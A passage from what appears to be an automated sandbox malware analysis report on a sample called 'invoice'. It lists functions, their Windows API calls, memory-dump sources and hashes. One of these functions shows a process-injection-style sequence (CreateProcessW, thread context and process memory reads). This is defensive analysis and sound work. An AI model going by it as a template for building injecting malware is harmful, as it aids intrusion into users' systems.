                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: 58f0f0b7e54908b99a741557de8a256e6c08155e91418cb76a294e985c864f1e
                        • Instruction ID: d2d41da5cc5d713ad8a88e72091f381c0c5bd2bfd0570f1d34def8ed8a641992
                        • Opcode Fuzzy Hash: 58f0f0b7e54908b99a741557de8a256e6c08155e91418cb76a294e985c864f1e
                        • Instruction Fuzzy Hash: 30115A71910208BFDB21DF68D844EEEB7B8EF04B50F008459F805D7224E2719F40A760
                        Function 0152C898 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0152D053
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0152D0E9
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0152D10B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                        • Instruction ID: 67002344f2a39ed35818b25ae3d5618e043bc6eaf5bfd15024cdd8afdb4eeefa
                        • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                        • Instruction Fuzzy Hash: EF62FA31A142189BEB24CFA4C841BDEB772FF59300F1095A9D20DEB2D0E7799E81CB59
                        Function 00FE9604 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F85045: _fseek.LIBCMT ref: 00F8505D
                          • Part of subcall function 00FE97DD: _wcscmp.LIBCMT ref: 00FE98CD
                          • Part of subcall function 00FE97DD: _wcscmp.LIBCMT ref: 00FE98E0
                        • _free.LIBCMT ref: 00FE974B
                        • _free.LIBCMT ref: 00FE9752
                        • _free.LIBCMT ref: 00FE97BD
                          • Part of subcall function 00FA2ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA9BA4), ref: 00FA2EE9
                          • Part of subcall function 00FA2ED5: GetLastError.KERNEL32(00000000,?,00FA9BA4), ref: 00FA2EFB
                        • _free.LIBCMT ref: 00FE97C5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                        • String ID:
                        • API String ID: 1552873950-0
                        • Opcode ID: a87b705b3ae5ae33e206766d6325fe0730d82beb17e6b297fdaebfaef393be7f
                        • Instruction ID: 1475703e6a1ed006c3b0840db06c298a1347de1c50cb7e80f5c8d17916c1e242
                        • Opcode Fuzzy Hash: a87b705b3ae5ae33e206766d6325fe0730d82beb17e6b297fdaebfaef393be7f
                        • Instruction Fuzzy Hash: AF517FF1D04259AFDF249F65CC81A9EBBB9EF48710F1004AEF209A7241DB755A80DF68
                        Function 00FA487A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                        • String ID:
                        • API String ID: 2782032738-0
                        • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                        • Instruction ID: 57a32a86dbdaccf95397c861df83e36b4bc78efb2d6a2798a4ae792404eebbaf
                        • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                        • Instruction Fuzzy Hash: 6E41F4B1A0070A9FDB18CE69D88096F7BA6AFCA370B24853DE815C7640D7F4FD51AB50
                        Function 00F873E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FBED92
                        • GetOpenFileNameW.COMDLG32(?), ref: 00FBEDDC
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                          • Part of subcall function 00FA0911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA0930
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Name$Path$FileFullLongOpen_memset
                        • String ID: X
                        • API String ID: 3777226403-3081909835
                        • Opcode ID: 45f9eaa42579582d6f186a2dbeb7263722a499a4bbc1be89f5b7a3a38eb47358
                        • Instruction ID: effc3cd5ebe724c2a12eda2f7453e0a4a21a99f90ce5cab057a0482518619ad3
                        • Opcode Fuzzy Hash: 45f9eaa42579582d6f186a2dbeb7263722a499a4bbc1be89f5b7a3a38eb47358
                        • Instruction Fuzzy Hash: E321D571A002489BCF55EF94CC45BEE7BFCAF49314F10805AF448A7241DBB899899FA1
                        Function 00FE998C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?), ref: 00FE99A1
                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FE99B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        • Opcode ID: cd684b83e9773d68d31b33b1148584a3054b547b0480d34e8faee6b2fd7d7e71
                        • Instruction ID: 78426b1dadbfca817a62de6f7fc354b1c1ac1ecced9efbc76e67a789cca04d36
                        • Opcode Fuzzy Hash: cd684b83e9773d68d31b33b1148584a3054b547b0480d34e8faee6b2fd7d7e71
                        • Instruction Fuzzy Hash: A5D05E7954030EABDB709BA0EC0EF9A773CE704700F0042A1BAD495091EAB5A6989B91
                        Function 00FFCBF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d19e81124d59fbdebcd5d2f225d63aaa7f3b70a0846cc4337bfdb7168735954d
                        • Instruction ID: 087cea1f1c06f83da1a37ceb97859c067971a3025947bace3558eb5c3c9106e8
                        • Opcode Fuzzy Hash: d19e81124d59fbdebcd5d2f225d63aaa7f3b70a0846cc4337bfdb7168735954d
                        • Instruction Fuzzy Hash: C0F17B719083099FC714DF28C880A6ABBE5FF88314F14892EF9999B351DB75E905DF82
                        Function 00F8F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA0313
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA031B
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA0326
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA0331
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA0339
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA0341
                          • Part of subcall function 00F96259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F8FA90), ref: 00F962B4
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F8FB2D
                        • OleInitialize.OLE32(00000000), ref: 00F8FBAA
                        • CloseHandle.KERNEL32(00000000), ref: 00FC4921
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 1986988660-0
                        • Opcode ID: 4561acf4905f37aa317ef0d5f4cc48be60ebb13abcfa17f34b551fef0c039e01
                        • Instruction ID: 1d44fdb24dee1f474c926d748417b5e3c988866d6e12efe466f932c208110137
                        • Opcode Fuzzy Hash: 4561acf4905f37aa317ef0d5f4cc48be60ebb13abcfa17f34b551fef0c039e01
                        • Instruction Fuzzy Hash: F581CCF8A012408FC3A4EF39FED56597BE5FB8831A750812A9199CB259EB7E4404DF50
                        Function 00F843DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00F84401
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F844A6
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F844C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$_memset
                        • String ID:
                        • API String ID: 1505330794-0
                        • Opcode ID: 2623731e82ea9ce48b45a4898dd68e583005cf80c033d0b644e4f8861fb0489e
                        • Instruction ID: 2bba440e6c7f74bdbd6d38e9bb385bcca8794b36c5e15298f321aa5b22fd9a59
                        • Opcode Fuzzy Hash: 2623731e82ea9ce48b45a4898dd68e583005cf80c033d0b644e4f8861fb0489e
                        • Instruction Fuzzy Hash: 9B317CB09047028FD731EF24D98469BBBE8BB49318F00092EF99A83241E775A944DB92
                        Function 00FA588C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __FF_MSGBANNER.LIBCMT ref: 00FA58A3
                          • Part of subcall function 00FAA2EB: __NMSG_WRITE.LIBCMT ref: 00FAA312
                          • Part of subcall function 00FAA2EB: __NMSG_WRITE.LIBCMT ref: 00FAA31C
                        • __NMSG_WRITE.LIBCMT ref: 00FA58AA
                          • Part of subcall function 00FAA348: GetModuleFileNameW.KERNEL32(00000000,010433BA,00000104,?,00000001,00000000), ref: 00FAA3DA
                          • Part of subcall function 00FAA348: ___crtMessageBoxW.LIBCMT ref: 00FAA488
                          • Part of subcall function 00FA321F: ___crtCorExitProcess.LIBCMT ref: 00FA3225
                          • Part of subcall function 00FA321F: ExitProcess.KERNEL32 ref: 00FA322E
                          • Part of subcall function 00FA8CA8: __getptd_noexit.LIBCMT ref: 00FA8CA8
                        • RtlAllocateHeap.NTDLL(014F0000,00000000,00000001,00000000,?,?,?,00FA0F53,?), ref: 00FA58CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                        • String ID:
                        • API String ID: 1372826849-0
                        • Opcode ID: e183c03a68b769147c71ec68b3e4836bc6075e374b35d6b45eb3af78a8b89fbf
                        • Instruction ID: 3ac9c8b76976e7bd4637ae81efda2f32bd6ce32a34136ef6dc281d480dacc3ee
                        • Opcode Fuzzy Hash: e183c03a68b769147c71ec68b3e4836bc6075e374b35d6b45eb3af78a8b89fbf
                        • Instruction Fuzzy Hash: A101D2F6A50B129BD6242774AC42B2E7359EF83B71B100025F501AB182DEBD8D01A761
                        Function 00FE994B Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FE95F1,?,?,?,?,?,00000004), ref: 00FE9964
                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FE95F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FE997A
                        • CloseHandle.KERNEL32(00000000,?,00FE95F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FE9981
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: 040529922342997cdf5405c8970e8622950f08dadfd717b2c8024fb2c6880d55
                        • Instruction ID: cece92c0cee67b875d530049621310c82d5ad99b32487fdd134d423b799e469f
                        • Opcode Fuzzy Hash: 040529922342997cdf5405c8970e8622950f08dadfd717b2c8024fb2c6880d55
                        • Instruction Fuzzy Hash: 43E08632140215B7DB321B54EC0AFDE7B18AB06B70F108210FB94690D087B61911A798
                        Function 00F8AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID: CALL
                        • API String ID: 0-4196123274
                        • Opcode ID: 240e0cb6677e7d2c642246de18733bc894ae0f12d742e0a2374d47abcc142fac
                        • Instruction ID: da5e7bbb9cbe5f6f4ff21e4eaf964d0960cc565926f041e081bc90813c7b54ed
                        • Opcode Fuzzy Hash: 240e0cb6677e7d2c642246de18733bc894ae0f12d742e0a2374d47abcc142fac
                        • Instruction Fuzzy Hash: E8224971508301CFDB24EF14C895BAAB7E1FF85314F14896EE8968B261DB35EC45EB82
                        Function 00F84DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: EA06
                        • API String ID: 4104443479-3962188686
                        • Opcode ID: 29482d25878e981b74602d69c0d08e7bbee9f37ce9e9e4c7e0b527bf06944bac
                        • Instruction ID: 8122808fd14733eb5c3ab130d8a249ad54104a5bd9c1e8d90bf963bd8c0c769b
                        • Opcode Fuzzy Hash: 29482d25878e981b74602d69c0d08e7bbee9f37ce9e9e4c7e0b527bf06944bac
                        • Instruction Fuzzy Hash: 47419D62E0425A5BCF21BB64CC517FE7FA6AB01310F284075FC82DB182D6246D40B7E1
                        Function 00FE785C Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 60242e1f48b65c730d09099b3c52416c0981d520889be4a724d5cd7283b8dea3
                        • Instruction ID: 9b3f0b58f7534f50052a401e5640bfc7a5b3ccad48b207f791f53fabbb3f71fe
                        • Opcode Fuzzy Hash: 60242e1f48b65c730d09099b3c52416c0981d520889be4a724d5cd7283b8dea3
                        • Instruction Fuzzy Hash: 1341E4719083459FD720FFA9AC81ABEB7A8EF19350B284459F085AB243DF799C01F761
                        Function 00F87BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 110dd0e2576012a0094b73eb3352dcde9e624fd67b43ab06109a497bb09d0b37
                        • Instruction ID: 77c8306bcf8b369bb0635368a01957de41503b3e15dd8f30737d3cd871126c66
                        • Opcode Fuzzy Hash: 110dd0e2576012a0094b73eb3352dcde9e624fd67b43ab06109a497bb09d0b37
                        • Instruction Fuzzy Hash: 2731D6B2604606AFC714EF28D8D1FA9F3A9FF493207258629E419CB391DB70E850DB90
                        Function 00F8492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • IsThemeActive.UXTHEME ref: 00F84992
                          • Part of subcall function 00FA34EC: __lock.LIBCMT ref: 00FA34F2
                          • Part of subcall function 00FA34EC: DecodePointer.KERNEL32(00000001,?,00F849A7,00FD7F9C), ref: 00FA34FE
                          • Part of subcall function 00FA34EC: EncodePointer.KERNEL32(?,?,00F849A7,00FD7F9C), ref: 00FA3509
                          • Part of subcall function 00F84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F84A73
                          • Part of subcall function 00F84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F84A88
                          • Part of subcall function 00F83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F83B7A
                          • Part of subcall function 00F83B4C: IsDebuggerPresent.KERNEL32 ref: 00F83B8C
                          • Part of subcall function 00F83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,010452F8,010452E0,?,?), ref: 00F83BFD
                          • Part of subcall function 00F83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00F83C81
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F849D2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                        • String ID:
                        • API String ID: 1438897964-0
                        • Opcode ID: 7da23e1dcc78a2fc44367bb3f51019c921f4a75549a921634b9c49bb7bf09438
                        • Instruction ID: 057e413d7cc8b4e0ea2c27f5284e6fa166b00e4bb8fd0e07dc2697001a6baf7b
                        • Opcode Fuzzy Hash: 7da23e1dcc78a2fc44367bb3f51019c921f4a75549a921634b9c49bb7bf09438
                        • Instruction Fuzzy Hash: 7B11C0B58083019FC720EF68DE8594AFBE8EB89710F00451FF085872A1DBBA9544DB82
                        Function 00FA0F36 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FA588C: __FF_MSGBANNER.LIBCMT ref: 00FA58A3
                          • Part of subcall function 00FA588C: __NMSG_WRITE.LIBCMT ref: 00FA58AA
                          • Part of subcall function 00FA588C: RtlAllocateHeap.NTDLL(014F0000,00000000,00000001,00000000,?,?,?,00FA0F53,?), ref: 00FA58CF
                        • std::exception::exception.LIBCMT ref: 00FA0F6C
                        • __CxxThrowException@8.LIBCMT ref: 00FA0F81
                          • Part of subcall function 00FA871B: RaiseException.KERNEL32(?,?,?,01039E78,00000000,?,?,?,?,00FA0F86,?,01039E78,?,00000001), ref: 00FA8770
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                        • String ID:
                        • API String ID: 3902256705-0
                        • Opcode ID: 0bb5f14b56b5316d95a396fb7db9ec4ae3d9be86071e053b7b64543a325c2a2a
                        • Instruction ID: 10ea8a909e25c605bd58930adee8c9f059fad0fab452bc5b27ce14ba49f3ce77
                        • Opcode Fuzzy Hash: 0bb5f14b56b5316d95a396fb7db9ec4ae3d9be86071e053b7b64543a325c2a2a
                        • Instruction Fuzzy Hash: 43F028B180420D6EDB24BA98FC019DE7BACDF02364F100425FC48A6282DFB89A91E2D1
                        Function 00FA5516 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FA8CA8: __getptd_noexit.LIBCMT ref: 00FA8CA8
                        • __lock_file.LIBCMT ref: 00FA555B
